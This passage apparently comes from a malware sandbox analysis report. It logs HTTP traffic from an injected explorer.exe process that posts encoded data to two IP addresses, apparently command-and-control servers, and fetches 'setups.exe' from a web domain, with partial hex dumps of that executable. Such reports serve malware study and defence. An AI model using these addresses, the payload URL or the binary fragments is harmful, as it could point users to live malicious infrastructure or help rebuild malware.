                                                                              2024-07-27 12:53:17 UTC733INData Raw: 50 63 59 44 59 79 48 52 35 75 68 66 39 5a 69 7a 72 44 54 35 37 58 50 35 39 57 64 6a 62 6c 37 68 72 74 31 79 65 63 6f 6f 46 6b 4a 79 69 4d 37 55 30 6a 35 68 6f 42 6d 46 70 73 39 39 34 5a 33 79 47 52 79 31 38 32 59 69 67 6a 66 50 65 33 6a 54 76 2f 65 4a 63 4a 4c 70 65 75 62 39 58 61 48 51 76 7a 6e 4f 62 75 4a 72 68 6e 51 52 77 2f 51 6c 4f 6d 64 6e 34 37 5a 51 7a 37 54 78 34 69 33 49 68 7a 37 4d 62 4b 7a 32 39 79 6e 37 31 6f 6b 52 55 7a 71 58 68 64 37 46 59 36 52 53 66 36 49 46 58 63 62 58 6b 46 63 39 4c 50 6e 2b 4d 52 58 77 72 30 58 6b 52 55 70 39 58 59 71 64 76 34 44 43 37 64 31 6a 59 63 6d 4f 51 59 50 65 58 36 2f 4e 72 44 43 61 6d 77 70 49 4b 71 6b 35 53 61 54 38 59 7a 63 63 47 58 4e 6f 78 4e 7a 5a 77 56 55 4a 50 6f 30 63 35 39 62 35 33 4e 67 45 67 48 56
                                                                              Data Ascii: PcYDYyHR5uhf9ZizrDT57XP59Wdjbl7hrt1yecooFkJyiM7U0j5hoBmFps994Z3yGRy182YigjfPe3jTv/eJcJLpeub9XaHQvznObuJrhnQRw/QlOmdn47ZQz7Tx4i3Ihz7MbKz29yn71okRUzqXhd7FY6RSf6IFXcbXkFc9LPn+MRXwr0XkRUp9XYqdv4DC7d1jYcmOQYPeX6/NrDCamwpIKqk5SaT8YzccGXNoxNzZwVUJPo0c59b53NgEgHV


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449758107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:18 UTC236OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 134195
                                                                              2024-07-27 12:53:18 UTC16148OUTData Raw: 70 35 66 36 71 56 43 61 2b 57 61 6f 6d 66 65 4c 46 56 63 59 53 70 4c 39 39 6a 63 7a 46 66 32 38 2f 53 5a 51 65 67 42 74 34 31 30 4c 76 37 47 6e 44 56 4f 38 68 69 56 61 37 4b 50 44 71 65 6c 43 56 68 4d 55 4b 59 7a 4f 46 63 37 7a 32 47 62 6d 53 5a 44 36 41 38 65 72 32 78 51 66 73 79 36 6d 46 63 36 6a 6b 73 6d 37 69 4d 4b 4c 32 69 5a 4a 55 57 65 63 4e 6f 34 61 50 49 70 35 61 6a 76 7a 5a 58 77 45 6c 4c 63 46 63 5a 64 62 44 51 57 4a 44 49 48 32 61 4f 55 6b 49 42 39 31 79 78 44 55 52 62 4d 52 2b 6d 6e 66 62 78 49 41 58 35 43 6c 37 59 6d 6a 54 4c 6d 54 78 49 58 49 45 4d 42 6d 35 61 42 58 48 34 78 35 4c 6a 59 6e 70 38 51 37 65 44 76 39 44 50 69 35 46 66 57 7a 50 7a 6a 67 6c 35 53 43 4b 67 54 62 6a 58 79 72 36 4d 67 6d 31 6a 4d 4b 7a 49 35 6e 77 4c 50 76 79 70 4e
                                                                              Data Ascii: p5f6qVCa+WaomfeLFVcYSpL99jczFf28/SZQegBt410Lv7GnDVO8hiVa7KPDqelCVhMUKYzOFc7z2GbmSZD6A8er2xQfsy6mFc6jksm7iMKL2iZJUWecNo4aPIp5ajvzZXwElLcFcZdbDQWJDIH2aOUkIB91yxDURbMR+mnfbxIAX5Cl7YmjTLmTxIXIEMBm5aBXH4x5LjYnp8Q7eDv9DPi5FfWzPzjgl5SCKgTbjXyr6Mgm1jMKzI5nwLPvypN
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 44 5a 6b 72 61 70 32 70 70 61 4a 6d 54 50 46 63 5a 65 4d 68 4c 4d 66 39 63 47 35 6c 72 4b 4e 66 45 39 6f 33 72 52 72 6f 77 44 43 37 76 70 6f 76 44 4b 31 61 64 31 54 4d 53 4d 58 6a 38 6a 7a 34 54 4e 33 70 4e 32 30 45 4b 4d 6e 6f 48 6a 32 62 48 2f 52 31 46 43 4e 66 59 77 68 7a 45 54 30 64 75 39 4a 4d 5a 31 48 43 36 6e 6a 44 4f 63 7a 4b 67 54 79 71 57 6c 44 53 35 4c 46 4d 69 30 6b 51 57 66 71 35 44 73 58 76 5a 61 53 4b 4f 42 2b 59 35 44 4d 57 4c 61 45 42 57 66 53 2f 71 6d 65 49 6b 6b 64 6f 6e 30 39 55 42 44 4d 78 38 71 2f 70 63 39 5a 69 4f 4a 2b 6f 44 68 63 36 46 69 34 35 36 67 38 2b 4c 67 58 43 45 73 4c 47 69 73 57 57 44 31 4d 50 33 43 66 65 54 6a 49 50 58 65 79 37 69 38 52 56 6d 4e 59 63 74 4c 7a 73 64 36 6f 63 57 41 50 41 76 44 65 6a 36 44 77 47 70 37 64
                                                                              Data Ascii: DZkrap2ppaJmTPFcZeMhLMf9cG5lrKNfE9o3rRrowDC7vpovDK1ad1TMSMXj8jz4TN3pN20EKMnoHj2bH/R1FCNfYwhzET0du9JMZ1HC6njDOczKgTyqWlDS5LFMi0kQWfq5DsXvZaSKOB+Y5DMWLaEBWfS/qmeIkkdon09UBDMx8q/pc9ZiOJ+oDhc6Fi456g8+LgXCEsLGisWWD1MP3CfeTjIPXey7i8RVmNYctLzsd6ocWAPAvDej6DwGp7d
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 52 5a 48 56 47 46 4d 73 6a 31 65 59 36 62 30 74 62 45 6c 4a 68 77 73 57 2f 53 48 55 78 42 32 51 47 63 36 75 69 4f 72 39 33 32 56 47 6e 2b 75 68 6c 6c 56 64 73 36 43 58 41 68 50 4b 6c 54 4e 6d 4c 74 52 53 30 61 76 35 6c 65 4c 4b 2b 75 47 2f 71 56 42 57 52 7a 4c 42 76 4c 51 77 78 48 48 4e 6a 77 62 47 59 45 6d 56 39 64 39 31 59 4e 6f 38 37 78 30 46 30 66 36 45 54 79 77 58 72 57 6e 4c 2b 39 6b 4f 47 42 6e 68 71 70 38 57 30 6d 45 7a 75 6d 6d 37 64 46 66 39 4d 42 47 69 72 6b 50 4a 34 69 62 45 54 6c 42 63 6c 61 51 39 4f 4b 76 47 7a 4d 30 77 4c 6a 51 6d 76 43 4f 54 2f 49 55 48 39 65 71 69 79 7a 75 52 4c 6e 63 35 41 44 68 39 72 36 73 51 4d 4c 30 57 7a 47 42 53 53 6a 75 73 42 4e 76 75 64 37 70 4f 44 77 48 34 5a 4a 6e 43 63 74 67 4e 4e 63 42 4d 65 56 6d 50 39 73 39
                                                                              Data Ascii: RZHVGFMsj1eY6b0tbElJhwsW/SHUxB2QGc6uiOr932VGn+uhllVds6CXAhPKlTNmLtRS0av5leLK+uG/qVBWRzLBvLQwxHHNjwbGYEmV9d91YNo87x0F0f6ETywXrWnL+9kOGBnhqp8W0mEzumm7dFf9MBGirkPJ4ibETlBclaQ9OKvGzM0wLjQmvCOT/IUH9eqiyzuRLnc5ADh9r6sQML0WzGBSSjusBNvud7pODwH4ZJnCctgNNcBMeVmP9s9
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 69 65 53 55 62 6d 65 53 55 45 33 63 76 4e 38 55 2f 73 71 54 64 79 68 34 46 2b 50 64 64 52 44 57 69 42 52 58 2f 6b 7a 76 45 38 52 79 66 55 70 6a 36 2f 57 74 6b 53 6d 46 56 4d 49 69 4d 2b 6c 69 38 51 65 56 46 54 48 36 45 34 31 54 36 2f 57 49 42 64 59 79 70 42 4c 49 47 33 62 2b 68 73 59 31 41 74 62 55 79 63 30 79 5a 53 63 62 2f 74 68 6e 51 6e 69 64 45 38 67 32 73 78 57 68 4b 50 6a 70 52 7a 52 6e 64 63 34 59 72 6f 48 63 41 62 71 32 42 4e 55 30 41 64 62 68 2f 73 50 51 79 52 59 69 65 7a 55 39 30 43 52 4d 6b 66 69 57 58 33 33 6a 63 51 69 68 66 6a 33 36 48 61 78 57 35 77 61 6d 56 75 72 6f 37 68 4b 37 31 41 58 34 34 72 4b 2b 57 6f 74 43 51 6b 6a 2b 61 51 4a 39 4f 6d 43 77 2b 2f 47 77 42 79 75 48 55 6e 43 78 6a 79 67 62 6c 70 51 32 46 75 6c 48 43 6a 47 73 34 49 37
                                                                              Data Ascii: ieSUbmeSUE3cvN8U/sqTdyh4F+PddRDWiBRX/kzvE8RyfUpj6/WtkSmFVMIiM+li8QeVFTH6E41T6/WIBdYypBLIG3b+hsY1AtbUyc0yZScb/thnQnidE8g2sxWhKPjpRzRndc4YroHcAbq2BNU0Adbh/sPQyRYiezU90CRMkfiWX33jcQihfj36HaxW5wamVuro7hK71AX44rK+WotCQkj+aQJ9OmCw+/GwByuHUnCxjygblpQ2FulHCjGs4I7
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 41 34 78 4b 78 38 67 52 33 63 50 4c 30 7a 76 38 67 63 76 76 79 49 75 74 31 32 51 7a 49 7a 43 49 66 78 48 76 4e 30 4b 42 76 42 69 56 41 41 30 30 51 56 64 42 56 67 35 2b 37 78 37 72 64 43 7a 4c 35 70 63 6d 50 31 73 45 65 71 68 2f 78 6d 41 35 64 33 46 74 6e 70 4b 4e 71 49 32 50 37 73 54 61 46 32 73 39 67 32 42 79 75 49 43 4c 31 33 39 54 5a 6a 6d 61 72 42 72 78 39 37 4e 73 50 57 4e 45 45 71 73 49 49 72 52 70 37 79 2b 73 4e 4b 71 6d 6b 6d 54 32 52 79 6b 70 63 77 2f 6f 36 6c 4c 6a 4c 45 43 56 5a 37 54 79 78 73 45 63 70 72 46 58 65 4c 70 70 62 44 42 59 34 34 63 56 6d 36 67 78 6b 46 50 59 2b 74 76 44 56 6d 47 6b 6a 73 67 38 4e 57 6f 34 45 70 4b 68 4e 42 51 44 75 6a 35 62 51 35 64 79 59 33 4e 63 4e 67 4e 79 4d 57 48 46 61 38 52 30 2b 54 6d 41 7a 46 43 68 69 37 63
                                                                              Data Ascii: A4xKx8gR3cPL0zv8gcvvyIut12QzIzCIfxHvN0KBvBiVAA00QVdBVg5+7x7rdCzL5pcmP1sEeqh/xmA5d3FtnpKNqI2P7sTaF2s9g2ByuICL139TZjmarBrx97NsPWNEEqsIIrRp7y+sNKqmkmT2Rykpcw/o6lLjLECVZ7TyxsEcprFXeLppbDBY44cVm6gxkFPY+tvDVmGkjsg8NWo4EpKhNBQDuj5bQ5dyY3NcNgNyMWHFa8R0+TmAzFChi7c
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 50 67 36 2b 2f 57 76 33 70 75 73 32 59 58 34 4d 46 57 32 73 39 55 4f 2f 54 4c 53 4e 64 43 6b 57 78 30 51 53 4d 62 55 76 67 5a 6c 56 44 4b 68 65 53 56 54 33 46 6c 70 48 51 74 44 79 52 61 2b 46 36 52 38 30 55 52 54 35 43 4c 48 70 33 57 7a 2f 6d 75 4c 71 44 49 2b 78 72 6e 56 5a 69 50 57 57 42 44 62 70 6a 36 4d 79 48 7a 75 61 68 30 51 37 50 6e 4b 36 6c 4d 38 43 53 78 6d 55 6c 38 59 4c 42 4c 6c 77 30 74 56 75 6c 30 50 41 34 45 33 4c 6f 55 6c 61 78 65 33 72 48 6c 4d 2b 57 49 57 32 32 42 50 6d 52 6a 69 69 7a 49 53 6e 57 6b 59 32 4e 72 58 33 75 42 65 65 59 38 68 49 45 36 49 44 56 36 59 76 68 76 59 79 53 46 79 52 73 73 67 41 4d 73 39 55 6e 70 50 50 4f 73 46 4b 75 71 42 65 66 65 54 6f 32 42 54 6e 33 48 67 4c 46 67 48 4d 34 6b 4d 36 4f 7a 6f 50 4a 4c 72 68 57 67 38
                                                                              Data Ascii: Pg6+/Wv3pus2YX4MFW2s9UO/TLSNdCkWx0QSMbUvgZlVDKheSVT3FlpHQtDyRa+F6R80URT5CLHp3Wz/muLqDI+xrnVZiPWWBDbpj6MyHzuah0Q7PnK6lM8CSxmUl8YLBLlw0tVul0PA4E3LoUlaxe3rHlM+WIW22BPmRjiizISnWkY2NrX3uBeeY8hIE6IDV6YvhvYySFyRssgAMs9UnpPPOsFKuqBefeTo2BTn3HgLFgHM4kM6OzoPJLrhWg8
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 46 4d 6c 6b 78 31 2f 33 55 62 6d 45 53 61 56 71 72 6d 4a 49 51 4f 76 53 72 5a 72 39 68 46 6a 51 6a 37 30 67 54 33 6d 7a 79 66 4c 31 50 6f 4a 74 76 37 6f 50 6b 48 41 41 42 34 55 35 5a 4a 30 47 46 63 47 4c 72 7a 31 74 6b 4d 4c 69 5a 56 42 61 47 64 4f 6b 30 2b 55 32 59 71 6f 6a 71 58 4b 37 58 6d 55 4f 61 7a 75 57 77 48 2f 64 48 4a 67 38 68 76 4d 61 4d 32 51 65 41 63 44 6b 76 38 58 46 6d 74 6e 30 6a 42 45 59 45 79 33 65 4f 31 58 64 43 35 78 77 4e 4b 2b 33 76 5a 51 76 4b 72 4c 63 48 54 44 4a 2f 78 31 6a 77 4a 62 55 31 66 6c 65 61 67 75 70 62 49 2b 6b 46 50 46 73 53 71 70 77 79 70 4c 70 4b 4d 70 6d 4a 56 4d 54 49 49 6c 54 4f 44 47 59 43 77 52 77 65 61 33 43 6f 79 56 7a 54 5a 36 33 37 39 6b 2f 66 4c 58 79 56 36 54 72 34 59 43 49 2b 63 76 49 49 70 4e 32 7a 39 74
                                                                              Data Ascii: FMlkx1/3UbmESaVqrmJIQOvSrZr9hFjQj70gT3mzyfL1PoJtv7oPkHAAB4U5ZJ0GFcGLrz1tkMLiZVBaGdOk0+U2YqojqXK7XmUOazuWwH/dHJg8hvMaM2QeAcDkv8XFmtn0jBEYEy3eO1XdC5xwNK+3vZQvKrLcHTDJ/x1jwJbU1fleagupbI+kFPFsSqpwypLpKMpmJVMTIIlTODGYCwRwea3CoyVzTZ6379k/fLXyV6Tr4YCI+cvIIpN2z9t
                                                                              2024-07-27 12:53:18 UTC16384OUTData Raw: 71 4a 55 77 59 31 55 52 33 4b 7a 39 30 65 5a 7a 4d 4d 2f 42 6f 68 35 39 61 47 41 78 41 71 72 73 4c 75 4e 67 77 41 57 44 31 48 4c 70 68 63 74 79 65 73 41 34 75 39 30 38 71 64 68 44 66 58 6e 30 6a 31 6a 33 4c 59 6a 34 62 75 30 64 77 74 52 48 69 54 71 6e 70 50 61 55 4f 68 4d 37 69 72 2b 56 7a 73 66 72 4c 48 55 41 44 4b 59 49 42 4c 75 45 56 31 42 71 50 42 6c 31 55 49 37 68 6f 78 6a 63 79 58 61 70 65 57 43 5a 69 69 55 65 46 34 2b 61 6d 73 47 6f 48 63 56 58 7a 72 78 70 6f 6c 47 37 66 5a 47 4a 68 33 78 43 77 6f 46 7a 5a 58 73 36 4a 4f 6a 78 44 78 67 45 73 57 4e 6c 49 76 7a 49 66 39 5a 44 33 61 72 42 32 75 65 38 61 49 78 39 74 51 30 57 58 74 76 53 65 6c 39 63 62 4d 51 30 72 2f 71 48 50 78 44 33 44 61 76 62 6f 49 52 61 6a 69 52 31 68 71 4d 35 68 49 33 34 39 50 63
                                                                              Data Ascii: qJUwY1UR3Kz90eZzMM/Boh59aGAxAqrsLuNgwAWD1HLphctyesA4u908qdhDfXn0j1j3LYj4bu0dwtRHiTqnpPaUOhM7ir+VzsfrLHUADKYIBLuEV1BqPBl1UI7hoxjcyXapeWCZiiUeF4+amsGoHcVXzrxpolG7fZGJh3xCwoFzZXs6JOjxDxgEsWNlIvzIf9ZD3arB2ue8aIx9tQ0WXtvSel9cbMQ0r/qHPxD3DavboIRajiR1hqM5hI349Pc
                                                                              2024-07-27 12:53:18 UTC3359OUTData Raw: 2b 71 61 51 72 79 77 63 43 62 58 56 43 54 52 77 45 36 46 76 64 51 6b 61 2f 77 6c 56 6b 6f 73 68 6c 62 33 63 47 79 6e 75 44 72 37 6e 4a 41 38 78 50 43 76 4b 33 4b 44 54 51 38 32 71 74 6c 53 43 63 61 59 4e 6d 6a 78 62 6b 58 47 2b 2f 6e 33 48 37 65 31 75 71 55 47 6e 4f 77 6c 66 59 43 50 54 57 74 58 33 49 56 63 41 72 37 4e 50 63 48 64 44 5a 63 6b 6f 6a 67 79 74 78 63 50 4f 79 32 5a 45 46 66 61 6d 75 78 37 64 70 57 49 32 46 54 43 72 36 71 79 65 63 63 77 55 77 2b 44 50 62 39 62 6a 7a 6b 4d 47 46 43 6f 70 48 58 77 50 71 35 57 76 2b 4e 52 48 44 6f 55 56 49 30 57 71 44 68 46 63 4c 77 4c 5a 6b 51 51 36 4b 72 55 78 44 32 75 51 4e 6b 46 37 76 4a 56 59 76 31 72 2b 39 6e 48 35 49 63 4a 48 36 73 39 48 30 34 31 79 5a 43 42 34 63 59 59 75 46 52 4a 61 65 42 7a 50 46 63 77
                                                                              Data Ascii: +qaQrywcCbXVCTRwE6FvdQka/wlVkoshlb3cGynuDr7nJA8xPCvK3KDTQ82qtlSCcaYNmjxbkXG+/n3H7e1uqUGnOwlfYCPTWtX3IVcAr7NPcHdDZckojgytxcPOy2ZEFfamux7dpWI2FTCr6qyeccwUw+DPb9bjzkMGFCopHXwPq5Wv+NRHDoUVI0WqDhFcLwLZkQQ6KrUxD2uQNkF7vJVYv1r+9nH5IcJH6s9H041yZCB4cYYuFRJaeBzPFcw
                                                                              2024-07-27 12:53:19 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:19 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:19 UTC685INData Raw: 51 63 2f 34 37 33 2b 41 52 67 35 62 6a 45 6c 74 69 36 65 61 38 78 37 79 79 46 43 66 37 79 5a 74 73 71 32 31 61 41 2f 4c 6c 55 32 54 32 30 4c 78 41 41 2f 51 30 51 65 6b 6b 50 33 63 47 6c 62 48 54 64 72 66 6c 67 54 37 63 36 32 56 49 38 4f 56 6b 36 51 73 57 50 66 42 72 46 76 53 37 4e 6d 45 52 31 4c 44 4e 38 68 76 79 4d 61 30 56 7a 65 70 37 36 52 74 35 79 47 70 73 2b 45 32 38 31 61 2f 31 72 44 35 67 6f 48 62 77 41 41 73 6e 5a 35 79 37 70 42 47 2f 37 48 43 34 69 59 46 57 31 55 49 39 51 35 33 4f 68 6b 65 46 35 31 35 73 44 31 56 6d 79 2b 7a 56 6d 45 52 63 76 36 39 6b 46 33 7a 4f 71 58 57 6c 45 7a 6a 63 6f 65 45 56 56 6b 32 61 4d 49 57 39 47 32 73 49 55 74 69 4b 53 6c 45 66 56 79 6d 70 50 48 2f 34 42 31 71 4d 46 30 65 78 54 31 67 53 66 6e 61 65 4c 69 54 49 36 55
                                                                              Data Ascii: Qc/473+ARg5bjElti6ea8x7yyFCf7yZtsq21aA/LlU2T20LxAA/Q0QekkP3cGlbHTdrflgT7c62VI8OVk6QsWPfBrFvS7NmER1LDN8hvyMa0Vzep76Rt5yGps+E281a/1rD5goHbwAAsnZ5y7pBG/7HC4iYFW1UI9Q53OhkeF515sD1Vmy+zVmERcv69kF3zOqXWlEzjcoeEVVk2aMIW9G2sIUtiKSlEfVympPH/4B1qMF0exT1gSfnaeLiTI6U


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449762107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:20 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1143
                                                                              2024-07-27 12:53:20 UTC1143OUTData Raw: 68 50 62 54 69 6a 51 72 36 65 52 58 42 38 31 56 51 4c 4b 64 74 38 61 76 50 72 58 71 72 74 4e 70 44 4e 43 57 61 37 44 61 54 37 55 77 58 62 58 49 4b 63 4d 49 59 4e 74 54 72 64 69 65 32 67 32 4d 67 41 4a 4f 42 69 6c 6c 4b 51 30 51 45 6f 6a 33 59 69 71 6e 39 36 56 30 73 52 48 77 4c 5a 49 77 6c 35 45 72 2f 77 77 75 58 72 6c 65 57 4b 32 74 6f 67 75 31 35 69 42 73 67 43 45 53 43 6b 69 43 55 6d 59 77 4c 65 76 36 43 44 42 71 53 72 2f 77 57 6a 34 47 31 69 45 53 32 41 2f 77 62 56 34 76 77 62 63 46 6f 6f 4c 71 68 5a 52 73 7a 4d 6e 6c 51 35 35 31 39 45 65 50 68 77 50 56 50 39 42 6b 61 63 6f 57 76 66 7a 67 6f 42 4c 78 45 62 34 75 6e 39 58 41 59 41 4e 54 73 49 74 56 4d 6d 6e 5a 4d 7a 69 37 79 76 70 37 6f 2b 30 37 53 68 6c 53 42 77 32 6d 66 41 37 58 6f 59 64 79 66 35 44
                                                                              Data Ascii: hPbTijQr6eRXB81VQLKdt8avPrXqrtNpDNCWa7DaT7UwXbXIKcMIYNtTrdie2g2MgAJOBillKQ0QEoj3Yiqn96V0sRHwLZIwl5Er/wwuXrleWK2togu15iBsgCESCkiCUmYwLev6CDBqSr/wWj4G1iES2A/wbV4vwbcFooLqhZRszMnlQ5519EePhwPVP9BkacoWvfzgoBLxEb4un9XAYANTsItVMmnZMzi7yvp7o+07ShlSBw2mfA7XoYdyf5D
                                                                              2024-07-27 12:53:22 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:21 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:22 UTC685INData Raw: 61 6b 58 39 58 41 74 6e 73 72 42 73 51 67 6f 72 49 2b 73 43 50 74 54 2f 42 65 51 41 68 43 41 6d 50 38 6e 2b 35 47 50 70 76 37 70 4f 61 54 67 62 70 6e 2f 62 72 42 70 2f 70 41 63 69 4f 32 37 6f 69 79 4d 2f 32 70 54 46 52 6e 58 7a 34 44 36 47 39 76 35 69 56 30 4c 49 76 4a 59 79 7a 50 39 5a 58 50 62 57 62 34 39 69 55 78 4b 7a 61 38 65 4d 50 52 4b 4d 48 39 66 69 52 6e 44 63 39 4a 47 54 76 61 63 47 30 48 7a 45 4b 5a 32 42 58 71 4d 4a 36 43 47 6e 48 6a 6b 54 55 42 33 68 79 6b 65 68 37 75 2f 57 70 46 5a 68 4d 38 39 64 69 62 44 2b 5a 65 45 51 61 37 43 33 70 67 44 57 7a 41 31 46 4d 47 46 52 31 50 51 56 47 62 75 52 53 75 4e 7a 50 6f 5a 42 7a 63 72 69 36 47 65 43 5a 2b 54 41 77 74 56 6e 33 78 31 2f 54 2f 6e 5a 76 39 53 48 4b 49 48 51 51 4b 7a 55 42 48 6a 41 58 33 30
                                                                              Data Ascii: akX9XAtnsrBsQgorI+sCPtT/BeQAhCAmP8n+5GPpv7pOaTgbpn/brBp/pAciO27oiyM/2pTFRnXz4D6G9v5iV0LIvJYyzP9ZXPbWb49iUxKza8eMPRKMH9fiRnDc9JGTvacG0HzEKZ2BXqMJ6CGnHjkTUB3hykeh7u/WpFZhM89dibD+ZeEQa7C3pgDWzA1FMGFR1PQVGbuRSuNzPoZBzcri6GeCZ+TAwtVn3x1/T/nZv9SHKIHQQKzUBHjAX30


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449761162.0.235.844432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:20 UTC166OUTGET /setups.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: funrecipebooks.com
                                                                              2024-07-27 12:53:21 UTC289INHTTP/1.1 200 OK
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: application/x-msdownload
                                                                              last-modified: Wed, 24 Jul 2024 14:01:43 GMT
                                                                              accept-ranges: bytes
                                                                              content-length: 141944
                                                                              date: Sat, 27 Jul 2024 12:53:20 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
                                                                              2024-07-27 12:53:21 UTC16095INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 0a d1 c2 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 34 01 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 02 00 00 02 00 00 10 b8 02 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEde"04 @ @`@@
                                                                              2024-07-27 12:53:21 UTC8481INData Raw: 00 0a dc 06 6f 0d 01 00 0a 07 2a 11 05 2a 00 00 00 41 1c 00 00 02 00 00 00 3e 00 00 00 66 01 00 00 a4 01 00 00 0a 00 00 00 00 00 00 00 13 30 03 00 72 00 00 00 29 00 00 11 15 0a 73 31 01 00 06 0b 07 7b c2 00 00 04 04 6f 25 01 00 0a 07 03 7d bf 00 00 04 16 0c 2b 34 05 08 6f 30 01 00 0a 6f 31 01 00 0a 0d 09 72 60 14 00 70 7e b6 00 00 0a 6f 7c 00 00 0a 0d 07 7b c5 00 00 04 6f 32 01 00 0a 09 6f 33 01 00 0a 26 08 17 58 0c 08 05 6f 34 01 00 0a 32 c3 07 6f b2 00 00 0a 26 07 7b c0 00 00 04 0a 07 6f 0d 01 00 0a 06 2a 00 00 1b 30 05 00 9a 00 00 00 2a 00 00 11 03 6f 33 00 00 0a 2d 07 72 6a 14 00 70 10 01 04 6f 33 00 00 0a 2d 07 72 b6 14 00 70 10 02 00 0e 04 6f 33 00 00 0a 2d 15 72 e4 14 00 70 03 04 05 72 b5 05 00 70 28 5f 00 00 06 0a 2b 10 0e 04 03 04 05 72 b5 05 00
                                                                              Data Ascii: o**A>f0r)s1{o%}+4o0o1r`p~o|{o2o3&Xo42o&{o*0*o3-rjpo3-rpo3-rprp(_+r
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: 72 23 1a 00 70 6f 94 01 00 0a 02 7b af 00 00 04 1f 4f 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b af 00 00 04 1f 1c 6f 97 01 00 0a 02 7b af 00 00 04 72 3d 1a 00 70 6f 25 01 00 0a 02 7b b0 00 00 04 17 6f c2 01 00 0a 02 7b b0 00 00 04 20 a4 00 00 00 1f 22 73 92 01 00 0a 6f 93 01 00 0a 02 7b b0 00 00 04 72 4d 1a 00 70 6f 94 01 00 0a 02 7b b0 00 00 04 20 88 00 00 00 1f 19 73 95 01 00 0a 6f 96 01 00 0a 02 7b b0 00 00 04 1f 1b 6f 97 01 00 0a 02 7b b0 00 00 04 72 6f 1a 00 70 6f 25 01 00 0a 02 22 00 00 30 41 22 00 00 c0 41 73 9e 01 00 0a 28 9f 01 00 0a 02 17 28 a0 01 00 0a 02 20 4f 03 00 00 20 b3 01 00 00 73 95 01 00 0a 28 a1 01 00 0a 02 28 a2 01 00 0a 02 7b aa 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ab 00 00 04 6f a3 01 00 0a 02 28 a2 01 00 0a 02 7b ac 00
                                                                              Data Ascii: r#po{Oso{o{r=po%{o{ "so{rMpo{ so{o{ropo%"0A"As(( O s(({o({o({
                                                                              2024-07-27 12:53:21 UTC16384INData Raw: 09 00 bd 30 01 00 11 00 bd 30 06 00 19 00 bd 30 0a 00 29 00 bd 30 10 00 31 00 bd 30 15 00 39 00 bd 30 15 00 41 00 bd 30 15 00 51 00 bd 30 1a 00 59 00 bd 30 06 00 71 00 bd 30 20 00 b1 00 bd 30 06 00 81 01 bd 30 06 00 91 01 bd 30 1a 00 31 02 bd 30 06 00 79 03 bd 30 26 00 81 03 bd 30 06 00 99 03 bd 30 2c 00 f1 03 78 10 3d 00 99 00 6b 34 46 00 61 00 bd 30 06 00 b9 00 bd 30 15 00 89 00 4b 13 53 00 01 04 f3 39 5b 00 09 04 bd 30 61 00 a1 00 7f 10 67 00 79 00 bd 30 72 00 19 04 5c 40 81 00 31 00 ca 18 8c 00 79 00 bd 30 15 00 21 04 bd 30 9a 00 19 02 bd 30 a0 00 19 02 c8 16 a7 00 19 02 1c 3d 06 00 19 02 cc 23 06 00 01 04 b1 3a bb 00 01 04 82 1a c2 00 01 04 26 1d c7 00 01 04 26 1d cd 00 01 04 3e 36 d2 00 81 00 bd 30 01 00 61 00 f7 1c 8c 00 49 04 fa 18 e8 00 51 04 ff
